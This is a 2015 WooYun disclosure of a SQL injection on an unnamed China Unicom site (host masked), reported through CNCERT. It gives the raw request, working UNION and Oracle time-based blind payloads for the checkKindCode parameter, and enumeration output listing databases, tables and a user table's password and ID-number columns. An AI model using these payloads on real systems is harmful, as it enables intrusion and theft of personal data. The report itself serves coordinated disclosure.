当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0158202

漏洞标题:中国联通某站SQL注入漏洞(用户信息泄露)

相关厂商:中国联通

漏洞作者: 偶然

提交时间:2015-12-04 22:52

修复时间:2016-01-21 18:22

公开时间:2016-01-21 18:22

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-12-04: 细节已通知厂商并且等待厂商处理中
2015-12-08: 厂商已经确认,细节仅向厂商公开
2015-12-18: 细节向核心白帽子及相关领域专家公开
2015-12-28: 细节向普通白帽子公开
2016-01-07: 细节向实习白帽子公开
2016-01-21: 细节向公众公开

简要描述:

详细说明:

POST /CKindMessageControl/createCookies.do HTTP/1.1
Host: **.**.**.**
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: application/json, text/javascript, */*
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://**.**.**.**/login.jsp
Content-Length: 36
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
checkCode=123456&checkKindCode=admin


Parameter: checkKindCode
    Type: UNION query
    Title: Generic UNION query (NULL) - 21 columns
    Payload: checkCode=123456&checkKindCode=admin' UNION ALL SELECT CHR(58)||CHR(98)||CHR(105)||CHR(109)||CHR(58)||CHR(67)||CHR(67)||CHR(102)||CHR(114)||CHR(89)||CHR(87)||CHR(109)||CHR(106)||CHR(101)||CHR(66)||CHR(58)||CHR(119)||CHR(101)||CHR(122)||CHR(58),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM DUAL-- 
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: checkCode=123456&checkKindCode=admin' AND 3836=DBMS_PIPE.RECEIVE_MESSAGE(CHR(106)||CHR(86)||CHR(122)||CHR(114),5) AND 'EEON'='EEON
---
back-end DBMS: Oracle
available databases [16]:
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] EXFSYS
[*] MDSYS
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] SCOTT
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WMSYS
[*] XDB
[*] XXTY

漏洞证明:

Database: XXTY
[267 tables]
+---------------------------+
| APN_DEVICETOKEN           |
| APN_USER                  |
| CHARGE_PACKAGE            |
| CLIENT_CLASSRING          |
| CLIENT_COLLECTION         |
| CLIENT_COMMENTS           |
| CLIENT_COMMENTSNEWS       |
| CLIENT_FILETASK           |
| CLIENT_KINDNEWSFILE       |
| CLIENT_KINDNEWSINFO       |
| CLIENT_LIMITMODEL         |
| CLIENT_PRAISE             |
| CLIENT_REPLYCOMMENTS      |
| CLIENT_REPLYNEWSCOMMENTS  |
| CLIENT_REPLYVIDEOCOMMENTS |
| CLIENT_SPACENEWMESSAGE    |
| CLIENT_TEACHERLOGTEXT     |
| CLIENT_VALIDATEPHONE      |
| CLIENT_VIDEODEVICE        |
| CLIENT_VIDEOSERVER        |
| CLIENT_WATCHHOUSE         |
| CLIENT_WATCHUSER          |
| CLIENT_WATCH_FAMILYUSER   |
| CODE_KINDPROVINCECITY     |
| FAMILY_TRIGGERSLOG        |
| KIND_ADVERTISING          |
| KIND_ADVERTISINGTYPE      |
| KIND_ANDROIDVERSIONS      |
| KIND_ANSWER               |
| KIND_BACKMODULE           |
| KIND_CLOUDKINDUSER        |
| KIND_CLOUNDKINDMESSAGE    |
| KIND_DIARYINFO            |
| KIND_FAMILYLOGTEXT        |
| KIND_FAMILYLOGTEXTFILE    |
| KIND_FAMILYPHOTO          |
| KIND_FAMILYPHOTOTYPE      |
| KIND_FEEDBACK             |
| KIND_FEEDBACKASTATE       |
| KIND_KINDMESSAGE          |
| KIND_LESSONPLAN           |
| KIND_LESSONPLANPHOTO      |
| KIND_LESSONREVIEW         |
| KIND_LINK                 |
| KIND_MANAGECLIENTTABLE    |
| KIND_NEWS                 |
| KIND_NEWSCOLUMN           |
| KIND_NEWSLOGINUSER        |
| KIND_NEWSREVIEW           |
| KIND_NOPASSMESSAGE        |
| KIND_ONLINEMESSAGE        |
| KIND_OPINION              |
| KIND_PARTITIONDICTIONARY  |
| KIND_PHOTOINFO            |
| KIND_PHOTO_NEWS           |
| KIND_PROFICIENT           |
| KIND_REPLACE              |
| KIND_REPLYOPINION         |
| KIND_TEACHERWORKDATA      |
| KIND_TRIGGERSLOG          |
| KIND_TRIGGERSRESOURCE     |
| KIND_VIDEONEWS            |
| MSG_DEVICETOKEN_ANDROID   |
| MSG_DEVICETOKEN_EASEMOB   |
| MSG_DEVICETOKEN_IOS       |
| MSG_EASEMOBMSGTASK        |
| MSG_LIST_ANDROID          |
| MSG_LIST_IOS              |
| MSG_NOTICE_ANDROID        |
| MSG_NOTICE_IOS            |
| MSG_PNBUSLEAVEMSG         |
| MSG_PNBUSMSG              |
| MSG_PNLIFEHELP            |
| MSG_RECEIVELOG            |
| MSG_SENDSUCCESS_ANDROID   |
| MSG_SEND_ANDROID          |
| MSG_SEND_IOS              |
| MSG_SMSMESSAGEBYEXCEPTION |
| MSG_SMSMESSAGEBYMANUAL    |
| MSG_SMSMESSAGELOG         |
| MSG_SMSMESSAGETASK        |
| MSG_SMSMODEL              |
| MSG_TEMPLIST_ANDROID      |
| MSG_TEMPLIST_IOS          |
| MYTEST_USER               |
| NEW_PHOTO_STUPHOTOMSG     |
| OA2_USER                  |
| QUICK_TABLE               |
| SHIMIAO_USER              |
| SHI_BUYBOOKINFO           |
| SHI_CAPITAL               |
| SYS_ACCESSFILE            |
| SYS_ACCESSORIES           |
| SYS_ACCESSORIESATTACHMENT |
| SYS_ACTIVITYC             |
| SYS_ACTIVITYS             |
| SYS_ATTENDANCE            |
| SYS_ATTENDANCECOUNT       |
| SYS_ATTENDANCEFILES       |
| SYS_ATTENDANCELOG         |
| SYS_ATTENDANCENEWS        |
| SYS_ATTENDANCESTUSAVE     |
| SYS_ATTENDANCEVIDEO       |
| SYS_AUTOGRAPHINFO         |
| SYS_CARDLOG               |
| SYS_CHECKINFO             |
| SYS_CLASS                 |
| SYS_CLASSEXAMINE          |
| SYS_CLASSPHOTO            |
| SYS_CLASSTABLEHISTORY     |
| SYS_COMMENTS              |
| SYS_CONFIG                |
| SYS_CONFIG_COOKBOOK       |
| SYS_CONFIG_DICTIONARYITEM |
| SYS_CONFIG_QUESTIONDIC    |
| SYS_CONFIG_WEEKLYPLAN     |
| SYS_COOKBOOK              |
| SYS_COOKBOOKCONFIG        |
| SYS_COOKBOOKEXPORT        |
| SYS_COOKFILE              |
| SYS_COOKINPICTURE         |
| SYS_COOKMENU              |
| SYS_COOKMSGBYDAY          |
| SYS_COURSEWARE            |
| SYS_DICTIONARY            |
| SYS_DICTIONARYITEM        |
| SYS_ERRORLOGIOS           |
| SYS_EXAMINECOMMENT        |
| SYS_FILE                  |
| SYS_FILELOG               |
| SYS_HARDWARECFG           |
| SYS_HOMEVISIT             |
| SYS_HOMEVISITFILE         |
| SYS_HOMEVISITMODE         |
| SYS_INFORMATIONBANK       |
| SYS_INFORMATIONBANKFILE   |
| SYS_KINDACTIVITY          |
| SYS_KINDBUS               |
| SYS_KINDFILE              |
| SYS_KINDMESSAGE           |
| SYS_KINDMODULECHECKINFO   |
| SYS_KINDVIDEO             |
| SYS_KINDVIDEOCOMMENTS     |
| SYS_KINDVIDEOFOREVER      |
| SYS_KINDWECHAT            |
| SYS_KINDWORKUPLOAD        |
| SYS_KINDWORKUPLOADLOG     |
| SYS_KINDWX                |
| SYS_KMSINFOLOG            |
| SYS_KMSLOG                |
| SYS_KNOWLEDGEBASE         |
| SYS_LEARNCOMMENT          |
| SYS_LOGANDROID            |
| SYS_MOBILEMODELOPT        |
| SYS_MOBILEMODELOPTION     |
| SYS_MODULE                |
| SYS_MODULECHECKINFO       |
| SYS_MODULEFUNCTION        |
| SYS_MODULEKINDCHECKINFO   |
| SYS_MODULERIGHT           |
| SYS_NIGHTSTORY            |
| SYS_PARENTALADV           |
| SYS_PARENTALADVPHOTO      |
| SYS_PHOTOCOMMENTS         |
| SYS_PHOTOCOMPLETE         |
| SYS_PHOTOTASK             |
| SYS_PHOTO_STUACTIVITY     |
| SYS_PHOTO_STUPHOTOMSG     |
| SYS_PNMESSAGEFAILURE      |
| SYS_PNMESSAGEFILE         |
| SYS_PNMESSAGEINFO         |
| SYS_PNMESSAGELOG          |
| SYS_PNSENDMESSAGE         |
| SYS_PNSENDMESSAGEOLD      |
| SYS_PNSENDMESSAGETEMP     |
| SYS_PNSENDMSG             |
| SYS_PN_MESSAGEWORK        |
| SYS_PN_MESSAGEWORKLOG     |
| SYS_POSTMANAGE            |
| SYS_PUNCH_MACHINE         |
| SYS_QUESTIONNAIREINFO     |
| SYS_QUESTIONNAIREMESSAGE  |
| SYS_QUESTIONNAIRES        |
| SYS_ROLE                  |
| SYS_RULESSYSTEM           |
| SYS_STUACTIVITY           |
| SYS_STUDENT               |
| SYS_STUDENTACTIVITY       |
| SYS_STUDENTBILLS          |
| SYS_STUDENTCARDS          |
| SYS_STUDENTEASEMOB        |
| SYS_STUDENTEMP            |
| SYS_STUDENTEXAMINE        |
| SYS_STUDENTFAMILY         |
| SYS_STUDENTHOLIDAY        |
| SYS_STUDENTLEARNING       |
| SYS_STUDENTLEAVE          |
| SYS_STUDENTLOG            |
| SYS_STUDENTPHYSICAL       |
| SYS_STUDENTREGEASEMOBLOG  |
| SYS_STUDENTSET            |
| SYS_STUMORNEXAMINE        |
| SYS_STUMORNEXAMINE_S      |
| SYS_STUMORNEXAMINE_TEMP   |
| SYS_STUNIGHTEXAMINE       |
| SYS_SYSEMAILURL           |
| SYS_SYSUSERLOG            |
| SYS_TABLESALIASE          |
| SYS_TEACHERARCHIVES       |
| SYS_TEACHERARCHIVESFILE   |
| SYS_TEACHEREXAMINE        |
| SYS_TEACHERTRANSACTION    |
| SYS_TEADAYEXAMINE         |
| SYS_TEAHERARCHIVESMODE    |
| SYS_TEAMONTHEXAMINE       |
| SYS_TEATALKFILE           |
| SYS_TEATALKTEXT           |
| SYS_TEAWORK               |
| SYS_TEMPORARYFILE         |
| SYS_UPLOADFILE            |
| SYS_UPLOADFILECOMPLETE    |
| SYS_USER                  |
| SYS_USERCONFIG            |
| SYS_USERINFOACCESSORY     |
| SYS_VACATIONSTUDENT       |
| SYS_VPFILEUPLOAD          |
| SYS_VPOPTION              |
| SYS_WECHATLEVELS          |
| SYS_WEEKINFOWORK          |
| SYS_WEEKLYINPICTURE       |
| SYS_WEEKLYPLAN            |
| SYS_WEEKLYPLANEXPORT      |
| SYS_WEEKLYPLANREMARK      |
| SYS_WEEKSPLAN             |
| SYS_WXLOGIN               |
| SYS_WXPHOTO               |
| TEMP_STULEAVE             |
| WEB_EMPLOYEE              |
| WEB_KINDBASICINFO         |
| WEB_KINDCLASS             |
| WEB_KINDFOCUSPHOTO        |
| WEB_KINDFRUIT             |
| WEB_KINDGROUPPHOTO        |
| WEB_KINDINTRODUCE         |
| WEB_KINDMESSAGE           |
| WEB_KINDNETPHOTO          |
| WEB_KINDNEWS              |
| WEB_KINDNEWSPHOTO         |
| WEB_KINDRECRUITMENT       |
| WEB_KINDTEACHER           |
| WEB_KINDTEACHERMIEN       |
| WEB_KINDUSER              |
| WEB_KIND_FEEDBACK         |
| WEB_KIND_LINKUS           |
| WEB_KIND_MODULE           |
| WEB_KIND_NEWS             |
| WEB_KIND_NEWSFILE         |
| WEB_KIND_OPINION          |
| WEB_KIND_USER             |
| WEB_PHOTO                 |
| WEB_PHOTOALBUM            |
| WEB_REGINFO               |
| WEB_TEXTBOOK              |
| WEB_TEXTBOOKTYPE          |
| WX_BACKUSER               |
| WX_MESSAGEINFO            |
| WX_MESSAGELOG             |
+-------------------Database: XXTY
Table: SYS_USER
[24 columns]
+-----------------+----------+
| Column          | Type     |
+-----------------+----------+
| ACCOUNTADDRESS  | VARCHAR2 |
| ADDRESS         | VARCHAR2 |
| BIRTHDAY        | VARCHAR2 |
| CLIENTLOGINDATE | DATE     |
| DESCRIPTION     | VARCHAR2 |
| ENDONLINEDATE   | DATE     |
| ETHNIC          | VARCHAR2 |
| FIXEDPHONE      | VARCHAR2 |
| GENDER          | VARCHAR2 |
| IDNUMBER        | VARCHAR2 |
| ISREGEASEMOB    | NUMBER   |
| KINDID          | VARCHAR2 |
| LOGINUSER       | VARCHAR2 |
| MOBILEPHONE     | VARCHAR2 |
| PARTITIONCODE   | VARCHAR2 |
| PHOTOHEADURL    | VARCHAR2 |
| POSTID          | VARCHAR2 |
| PWD             | VARCHAR2 |
| RFID            | VARCHAR2 |
| ROLEID          | NUMBER   |
| STATUSFLAG      | VARCHAR2 |
| USERID          | VARCHAR2 |
| USERNAME        | VARCHAR2 |
| USERNAMEAUDIO   | VARCHAR2 |
+-----------------+----------+
--------+
lt1.png

修复方案:

版权声明:转载请注明来源 偶然@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-12-08 13:03

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT向中国联合网络通信集团有限公司通报,由其后续协调网站管理部门处置.

最新状态:

暂无

漏洞评价:

评价